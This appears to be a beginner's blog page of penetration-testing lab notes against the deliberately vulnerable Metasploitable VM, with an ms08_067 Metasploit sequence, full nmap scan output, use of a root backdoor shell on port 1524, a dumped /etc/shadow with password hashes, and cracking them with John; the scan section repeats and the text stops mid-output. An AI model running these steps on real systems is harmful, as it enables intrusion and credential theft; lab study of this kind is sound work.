1. Run metasploit
#msfconsole
2. exploit smb on wondows
#use exploit/windows/smb/ms08_067_netapi
3. show options for input data
#show options
4. set rhost, because options ask rhost and that is required
#set rhost IP_target
5. set payload
#set payload windows/meterpreter/bind_tcp
6. now is exploit windows
#exploit
Now use command on linux for exploit :)
Saturday, November 17, 2012
looking vulnerable of metasploitable
1.Information Gathering
> Scan IP target
#nmap 192.168,249.129
> For more detail, i used zenmap
open zenmap, input IP target and choose Intense scan, all TCP ports on profile then scan.
this is command on terminal :
#nmap -p 1-65535 -T4 -A -v 192.168.249.129
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-11-17 22:46 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 22:46
Scanning 192.168.249.129 [1 port]
Completed ARP Ping Scan at 22:46, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:46
Completed Parallel DNS resolution of 1 host. at 22:47, 9.40s elapsed
Initiating SYN Stealth Scan at 22:47
Scanning 192.168.249.129 [65535 ports]
Discovered open port 445/tcp on 192.168.249.129
Discovered open port 5900/tcp on 192.168.249.129
Discovered open port 111/tcp on 192.168.249.129
Discovered open port 22/tcp on 192.168.249.129
Discovered open port 21/tcp on 192.168.249.129
Discovered open port 23/tcp on 192.168.249.129
Discovered open port 139/tcp on 192.168.249.129
Discovered open port 53/tcp on 192.168.249.129
Discovered open port 3306/tcp on 192.168.249.129
Discovered open port 80/tcp on 192.168.249.129
Discovered open port 25/tcp on 192.168.249.129
Discovered open port 513/tcp on 192.168.249.129
Discovered open port 33496/tcp on 192.168.249.129
Discovered open port 37837/tcp on 192.168.249.129
Discovered open port 39199/tcp on 192.168.249.129
Discovered open port 6667/tcp on 192.168.249.129
Discovered open port 6000/tcp on 192.168.249.129
Discovered open port 514/tcp on 192.168.249.129
Discovered open port 1099/tcp on 192.168.249.129
Discovered open port 8180/tcp on 192.168.249.129
Discovered open port 54880/tcp on 192.168.249.129
Discovered open port 6697/tcp on 192.168.249.129
Discovered open port 5432/tcp on 192.168.249.129
Discovered open port 3632/tcp on 192.168.249.129
Discovered open port 8009/tcp on 192.168.249.129
Discovered open port 512/tcp on 192.168.249.129
Discovered open port 8787/tcp on 192.168.249.129
Discovered open port 1524/tcp on 192.168.249.129
Discovered open port 2121/tcp on 192.168.249.129
Discovered open port 2049/tcp on 192.168.249.129
Completed SYN Stealth Scan at 22:47, 1.41s elapsed (65535 total ports)
Initiating Service scan at 22:47
Scanning 30 services on 192.168.249.129
Completed Service scan at 22:49, 126.08s elapsed (30 services on 1 host)
Initiating RPCGrind Scan against 192.168.249.129 at 22:49
Completed RPCGrind Scan against 192.168.249.129 at 22:49, 0.14s elapsed (5 ports)
Initiating OS detection (try #1) against 192.168.249.129
NSE: Script scanning 192.168.249.129.
Initiating NSE at 22:49
Completed NSE at 22:49, 30.88s elapsed
Nmap scan report for 192.168.249.129
Host is up (0.0038s latency).
Not shown: 65505 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Not valid before: 2010-03-17 14:07:45
| Not valid after: 2010-04-16 14:07:45
| MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 37837/tcp mountd
| 100005 1,2,3 48481/udp mountd
| 100021 1,3,4 33496/tcp nlockmgr
| 100021 1,3,4 45962/udp nlockmgr
| 100024 1 54880/tcp status
|_ 100024 1 57928/udp status
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open ingreslock?
2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 9
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: l@6.$id=@hk`#*Jt,{G2
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ Unknown security type (33554432)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
|_irc-info: ERROR: Closing Link: [192.168.249.1] (Too many unknown connections from your IP)
6697/tcp open irc Unreal ircd
|_ssl-cert: ERROR
| irc-info: Server: irc.Metasploitable.LAN
| Version: Unreal3.2.8.1. irc.Metasploitable.LAN
| Lservers/Lusers: 0/1
| Uptime: 0 days, 0:19:32
| Source host: F347BFD8.7010A1C8.FFFA6D49.IP
|_Source ident: OK nmap
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/5.5
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
8787/tcp open unknown
33496/tcp open nlockmgr (nlockmgr V1-4) 1-4 (rpc #100021)
37837/tcp open mountd (mountd V1-3) 1-3 (rpc #100005)
39199/tcp open unknown
54880/tcp open status (status V1) 1 (rpc #100024)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1524-TCP:V=5.61TEST4%I=7%D=11/17%Time=50A7B17C%P=i686-pc-linux-gnu%
SF:r(NULL,17,"root@metasploitable:/#\x20")%r(GenericLines,73,"root@metaspl
SF:oitable:/#\x20root@metasploitable:/#\x20root@metasploitable:/#\x20root@
SF:metasploitable:/#\x20root@metasploitable:/#\x20")%r(GetRequest,17,"root
SF:@metasploitable:/#\x20")%r(HTTPOptions,94,"root@metasploitable:/#\x20ba
SF:sh:\x20OPTIONS:\x20command\x20not\x20found\nroot@metasploitable:/#\x20r
SF:oot@metasploitable:/#\x20root@metasploitable:/#\x20root@metasploitable:
SF:/#\x20")%r(RTSPRequest,94,"root@metasploitable:/#\x20bash:\x20OPTIONS:\
SF:x20command\x20not\x20found\nroot@metasploitable:/#\x20root@metasploitab
SF:le:/#\x20root@metasploitable:/#\x20root@metasploitable:/#\x20")%r(RPCCh
SF:eck,17,"root@metasploitable:/#\x20")%r(DNSVersionBindReq,17,"root@metas
SF:ploitable:/#\x20")%r(DNSStatusRequest,17,"root@metasploitable:/#\x20")%
SF:r(Help,63,"root@metasploitable:/#\x20bash:\x20HELP:\x20command\x20not\x
SF:20found\nroot@metasploitable:/#\x20root@metasploitable:/#\x20")%r(SSLSe
SF:ssionReq,51,"root@metasploitable:/#\x20bash:\x20{O\?G,\x03Sw=:\x20comma
SF:nd\x20not\x20found\nroot@metasploitable:/#\x20")%r(Kerberos,AB,"root@me
SF:tasploitable:/#\x20bash:\x20qjn0k:\x20command\x20not\x20found\nroot@met
SF:asploitable:/#\x20root@metasploitable:/#\x20\x1b\[H\x1b\[Jbash:\x200krb
SF:tgtNM\x18:\x20command\x20not\x20found\n\x1b\[H\x1b\[Jroot@metasploitabl
SF:e:/#\x20")%r(SMBProgNeg,17,"root@metasploitable:/#\x20")%r(X11Probe,17,
SF:"root@metasploitable:/#\x20")%r(FourOhFourRequest,17,"root@metasploitab
SF:le:/#\x20")%r(LPDString,4F,"root@metasploitable:/#\x20bash:\x20default:
SF:\x20command\x20not\x20found\nroot@metasploitable:/#\x20")%r(LDAPBindReq
SF:,17,"root@metasploitable:/#\x20")%r(SIPOptions,395,"root@metasploitable
SF::/#\x20bash:\x20OPTIONS:\x20command\x20not\x20found\nroot@metasploitabl
SF:e:/#\x20root@metasploitable:/#\x20bash:\x20Via::\x20command\x20not\x20f
SF:ound\nroot@metasploitable:/#\x20root@metasploitable:/#\x20bash:\x20synt
SF:ax\x20error\x20near\x20unexpected\x20token\x20`;'\nroot@metasploitable:
SF:/#\x20root@metasploitable:/#\x20bash:\x20syntax\x20error\x20near\x20une
SF:xpected\x20token\x20`newline'\nroot@metasploitable:/#\x20root@metasploi
SF:table:/#\x20bash:\x20Call-ID::\x20command\x20not\x20found\nroot@metaspl
SF:oitable:/#\x20root@metasploitable:/#\x20bash:\x20CSeq::\x20command\x20n
SF:ot\x20found\nroot@metasploitable:/#\x20root@metasploitable:/#\x20bash:\
SF:x20Max-Forwards::\x20command\x20not\x20found\nroot@metasploitable:/#\x2
SF:0root@metasploitable:/#\x20bash:\x20Content-Length::\x20command\x20not\
SF:x20found\nroot@metasploitable:/#\x20root@metasploitable:/#\x20bash:\x20
SF:syntax\x20error\x20near\x20unexpected\x20token\x20`newline'\nroot@metas
SF:ploitable:/#\x20root@metasploitable:/#\x20bash:\x20Accept::\x20command\
SF:x20not\x20found\nroot@metasploitable:/#\x20root@metasploitable:/#\x20ro
SF:ot@metasploitable:/#\x20root@m");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8787-TCP:V=5.61TEST4%I=7%D=11/17%Time=50A7B17C%P=i686-pc-linux-gnu%
SF:r(GenericLines,3AB,"\0\0\0\x03\x04\x08F\0\0\x03\xa0\x04\x08o:\x16DRb::D
SF:RbConnError\x07:\x07bt\[\x17\"//usr/lib/ruby/1\.8/drb/drb\.rb:573:in\x2
SF:0`load'\"7/usr/lib/ruby/1\.8/drb/drb\.rb:612:in\x20`recv_request'\"7/us
SF:r/lib/ruby/1\.8/drb/drb\.rb:911:in\x20`recv_request'\"</usr/lib/ruby/1\
SF:.8/drb/drb\.rb:1530:in\x20`init_with_client'\"9/usr/lib/ruby/1\.8/drb/d
SF:rb\.rb:1542:in\x20`setup_message'\"3/usr/lib/ruby/1\.8/drb/drb\.rb:1494
SF::in\x20`perform'\"5/usr/lib/ruby/1\.8/drb/drb\.rb:1589:in\x20`main_loop
SF:'\"0/usr/lib/ruby/1\.8/drb/drb\.rb:1585:in\x20`loop'\"5/usr/lib/ruby/1\
SF:.8/drb/drb\.rb:1585:in\x20`main_loop'\"1/usr/lib/ruby/1\.8/drb/drb\.rb:
SF:1581:in\x20`start'\"5/usr/lib/ruby/1\.8/drb/drb\.rb:1581:in\x20`main_lo
SF:op'\"//usr/lib/ruby/1\.8/drb/drb\.rb:1430:in\x20`run'\"1/usr/lib/ruby/1
SF:\.8/drb/drb\.rb:1427:in\x20`start'\"//usr/lib/ruby/1\.8/drb/drb\.rb:142
SF:7:in\x20`run'\"6/usr/lib/ruby/1\.8/drb/drb\.rb:1347:in\x20`initialize'\
SF:"//usr/lib/ruby/1\.8/drb/drb\.rb:1627:in\x20`new'\"9/usr/lib/ruby/1\.8/
SF:drb/drb\.rb:1627:in\x20`start_service'\"%/usr/sbin/druby_timeserver\.")
SF:%r(GetRequest,3AC,"\0\0\0\x03\x04\x08F\0\0\x03\xa1\x04\x08o:\x16DRb::DR
SF:bConnError\x07:\x07bt\[\x17\"//usr/lib/ruby/1\.8/drb/drb\.rb:573:in\x20
SF:`load'\"7/usr/lib/ruby/1\.8/drb/drb\.rb:612:in\x20`recv_request'\"7/usr
SF:/lib/ruby/1\.8/drb/drb\.rb:911:in\x20`recv_request'\"</usr/lib/ruby/1\.
SF:8/drb/drb\.rb:1530:in\x20`init_with_client'\"9/usr/lib/ruby/1\.8/drb/dr
SF:b\.rb:1542:in\x20`setup_message'\"3/usr/lib/ruby/1\.8/drb/drb\.rb:1494:
SF:in\x20`perform'\"5/usr/lib/ruby/1\.8/drb/drb\.rb:1589:in\x20`main_loop'
SF:\"0/usr/lib/ruby/1\.8/drb/drb\.rb:1585:in\x20`loop'\"5/usr/lib/ruby/1\.
SF:8/drb/drb\.rb:1585:in\x20`main_loop'\"1/usr/lib/ruby/1\.8/drb/drb\.rb:1
SF:581:in\x20`start'\"5/usr/lib/ruby/1\.8/drb/drb\.rb:1581:in\x20`main_loo
SF:p'\"//usr/lib/ruby/1\.8/drb/drb\.rb:1430:in\x20`run'\"1/usr/lib/ruby/1\
SF:.8/drb/drb\.rb:1427:in\x20`start'\"//usr/lib/ruby/1\.8/drb/drb\.rb:1427
SF::in\x20`run'\"6/usr/lib/ruby/1\.8/drb/drb\.rb:1347:in\x20`initialize'\"
SF://usr/lib/ruby/1\.8/drb/drb\.rb:1627:in\x20`new'\"9/usr/lib/ruby/1\.8/d
SF:rb/drb\.rb:1627:in\x20`start_service'\"%/usr/sbin/druby_timeserver\.");
MAC Address: 00:0C:29:80:7F:B6 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.9 - 2.6.31
Uptime guess: 0.011 days (since Sat Nov 17 22:34:00 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=195 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel
Host script results:
| nbstat:
| NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| METASPLOITABLE<00> Flags: <unique><active>
| METASPLOITABLE<03> Flags: <unique><active>
| METASPLOITABLE<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2012-11-17 22:49:01 UTC-5
TRACEROUTE
HOP RTT ADDRESS
1 3.82 ms 192.168.249.129
NSE: Script Post-scanning.
Initiating NSE at 22:49
Completed NSE at 22:49, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.90 seconds
Raw packets sent: 65555 (2.885MB) | Rcvd: 65551 (2.623MB)
2. Service enumeration
#nmap -sV 192.168.249.129
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-11-17 22:51 WIT
Nmap scan report for 192.168.249.129
Host is up (0.00038s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open http Apache httpd 2.2.3
2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:80:7F:B6 (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, www.http.com, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel
3. Vulnerable assasment
> Now we used exploit-db for looking vulnerable
#cd /pentest/exploits/exploitdb/
#./searchploit (input version here)
>Here i try looking but couldn't find vulnerable, so i used nessus
go to directory of nessus then run
#/etc/init.d/nessud start
> open browser and type https://bt:8834/ then login
next step, choose scan, and add scan then input
Name : (required)
Type : (required)
Policy : (required)
Scan target : (required)
target file : (options/no required)
look pict
then press launch scan and wait a minute
> look report
there have Rogue shell backdoor detection, that means this system have backdoor, now click rogue shell backdoor and look port of backdoor
> Here we have port of backdoor, so next step is exploit
4. Exploit
> this step is exploit, because we have know is the system of metasploitable have backdoor, so we exploit used the backdoor via port
#telnet 192.168.249.129 1524
here I have entered into the metasploiatble's system,
now we want know how much user on this system
#cat etc/shadow/
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::
copy this shadow and make vulnerable.txt
> next step used john for look how user on this system
#cd /pentest/passwords/john/
#./john /root/vulnerable.txt
Finish :)
> Scan IP target
#nmap 192.168,249.129
> For more detail, i used zenmap
open zenmap, input IP target and choose Intense scan, all TCP ports on profile then scan.
this is command on terminal :
#nmap -p 1-65535 -T4 -A -v 192.168.249.129
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-11-17 22:46 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 22:46
Scanning 192.168.249.129 [1 port]
Completed ARP Ping Scan at 22:46, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:46
Completed Parallel DNS resolution of 1 host. at 22:47, 9.40s elapsed
Initiating SYN Stealth Scan at 22:47
Scanning 192.168.249.129 [65535 ports]
Discovered open port 445/tcp on 192.168.249.129
Discovered open port 5900/tcp on 192.168.249.129
Discovered open port 111/tcp on 192.168.249.129
Discovered open port 22/tcp on 192.168.249.129
Discovered open port 21/tcp on 192.168.249.129
Discovered open port 23/tcp on 192.168.249.129
Discovered open port 139/tcp on 192.168.249.129
Discovered open port 53/tcp on 192.168.249.129
Discovered open port 3306/tcp on 192.168.249.129
Discovered open port 80/tcp on 192.168.249.129
Discovered open port 25/tcp on 192.168.249.129
Discovered open port 513/tcp on 192.168.249.129
Discovered open port 33496/tcp on 192.168.249.129
Discovered open port 37837/tcp on 192.168.249.129
Discovered open port 39199/tcp on 192.168.249.129
Discovered open port 6667/tcp on 192.168.249.129
Discovered open port 6000/tcp on 192.168.249.129
Discovered open port 514/tcp on 192.168.249.129
Discovered open port 1099/tcp on 192.168.249.129
Discovered open port 8180/tcp on 192.168.249.129
Discovered open port 54880/tcp on 192.168.249.129
Discovered open port 6697/tcp on 192.168.249.129
Discovered open port 5432/tcp on 192.168.249.129
Discovered open port 3632/tcp on 192.168.249.129
Discovered open port 8009/tcp on 192.168.249.129
Discovered open port 512/tcp on 192.168.249.129
Discovered open port 8787/tcp on 192.168.249.129
Discovered open port 1524/tcp on 192.168.249.129
Discovered open port 2121/tcp on 192.168.249.129
Discovered open port 2049/tcp on 192.168.249.129
Completed SYN Stealth Scan at 22:47, 1.41s elapsed (65535 total ports)
Initiating Service scan at 22:47
Scanning 30 services on 192.168.249.129
Completed Service scan at 22:49, 126.08s elapsed (30 services on 1 host)
Initiating RPCGrind Scan against 192.168.249.129 at 22:49
Completed RPCGrind Scan against 192.168.249.129 at 22:49, 0.14s elapsed (5 ports)
Initiating OS detection (try #1) against 192.168.249.129
NSE: Script scanning 192.168.249.129.
Initiating NSE at 22:49
Completed NSE at 22:49, 30.88s elapsed
Nmap scan report for 192.168.249.129
Host is up (0.0038s latency).
Not shown: 65505 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Not valid before: 2010-03-17 14:07:45
| Not valid after: 2010-04-16 14:07:45
| MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 37837/tcp mountd
| 100005 1,2,3 48481/udp mountd
| 100021 1,3,4 33496/tcp nlockmgr
| 100021 1,3,4 45962/udp nlockmgr
| 100024 1 54880/tcp status
|_ 100024 1 57928/udp status
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open ingreslock?
2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 9
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: l@6.$id=@hk`#*Jt,{G2
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ Unknown security type (33554432)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
|_irc-info: ERROR: Closing Link: [192.168.249.1] (Too many unknown connections from your IP)
6697/tcp open irc Unreal ircd
|_ssl-cert: ERROR
| irc-info: Server: irc.Metasploitable.LAN
| Version: Unreal3.2.8.1. irc.Metasploitable.LAN
| Lservers/Lusers: 0/1
| Uptime: 0 days, 0:19:32
| Source host: F347BFD8.7010A1C8.FFFA6D49.IP
|_Source ident: OK nmap
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/5.5
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
8787/tcp open unknown
33496/tcp open nlockmgr (nlockmgr V1-4) 1-4 (rpc #100021)
37837/tcp open mountd (mountd V1-3) 1-3 (rpc #100005)
39199/tcp open unknown
54880/tcp open status (status V1) 1 (rpc #100024)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1524-TCP:V=5.61TEST4%I=7%D=11/17%Time=50A7B17C%P=i686-pc-linux-gnu%
SF:r(NULL,17,"root@metasploitable:/#\x20")%r(GenericLines,73,"root@metaspl
SF:oitable:/#\x20root@metasploitable:/#\x20root@metasploitable:/#\x20root@
SF:metasploitable:/#\x20root@metasploitable:/#\x20")%r(GetRequest,17,"root
SF:@metasploitable:/#\x20")%r(HTTPOptions,94,"root@metasploitable:/#\x20ba
SF:sh:\x20OPTIONS:\x20command\x20not\x20found\nroot@metasploitable:/#\x20r
SF:oot@metasploitable:/#\x20root@metasploitable:/#\x20root@metasploitable:
SF:/#\x20")%r(RTSPRequest,94,"root@metasploitable:/#\x20bash:\x20OPTIONS:\
SF:x20command\x20not\x20found\nroot@metasploitable:/#\x20root@metasploitab
SF:le:/#\x20root@metasploitable:/#\x20root@metasploitable:/#\x20")%r(RPCCh
SF:eck,17,"root@metasploitable:/#\x20")%r(DNSVersionBindReq,17,"root@metas
SF:ploitable:/#\x20")%r(DNSStatusRequest,17,"root@metasploitable:/#\x20")%
SF:r(Help,63,"root@metasploitable:/#\x20bash:\x20HELP:\x20command\x20not\x
SF:20found\nroot@metasploitable:/#\x20root@metasploitable:/#\x20")%r(SSLSe
SF:ssionReq,51,"root@metasploitable:/#\x20bash:\x20{O\?G,\x03Sw=:\x20comma
SF:nd\x20not\x20found\nroot@metasploitable:/#\x20")%r(Kerberos,AB,"root@me
SF:tasploitable:/#\x20bash:\x20qjn0k:\x20command\x20not\x20found\nroot@met
SF:asploitable:/#\x20root@metasploitable:/#\x20\x1b\[H\x1b\[Jbash:\x200krb
SF:tgtNM\x18:\x20command\x20not\x20found\n\x1b\[H\x1b\[Jroot@metasploitabl
SF:e:/#\x20")%r(SMBProgNeg,17,"root@metasploitable:/#\x20")%r(X11Probe,17,
SF:"root@metasploitable:/#\x20")%r(FourOhFourRequest,17,"root@metasploitab
SF:le:/#\x20")%r(LPDString,4F,"root@metasploitable:/#\x20bash:\x20default:
SF:\x20command\x20not\x20found\nroot@metasploitable:/#\x20")%r(LDAPBindReq
SF:,17,"root@metasploitable:/#\x20")%r(SIPOptions,395,"root@metasploitable
SF::/#\x20bash:\x20OPTIONS:\x20command\x20not\x20found\nroot@metasploitabl
SF:e:/#\x20root@metasploitable:/#\x20bash:\x20Via::\x20command\x20not\x20f
SF:ound\nroot@metasploitable:/#\x20root@metasploitable:/#\x20bash:\x20synt
SF:ax\x20error\x20near\x20unexpected\x20token\x20`;'\nroot@metasploitable:
SF:/#\x20root@metasploitable:/#\x20bash:\x20syntax\x20error\x20near\x20une
SF:xpected\x20token\x20`newline'\nroot@metasploitable:/#\x20root@metasploi
SF:table:/#\x20bash:\x20Call-ID::\x20command\x20not\x20found\nroot@metaspl
SF:oitable:/#\x20root@metasploitable:/#\x20bash:\x20CSeq::\x20command\x20n
SF:ot\x20found\nroot@metasploitable:/#\x20root@metasploitable:/#\x20bash:\
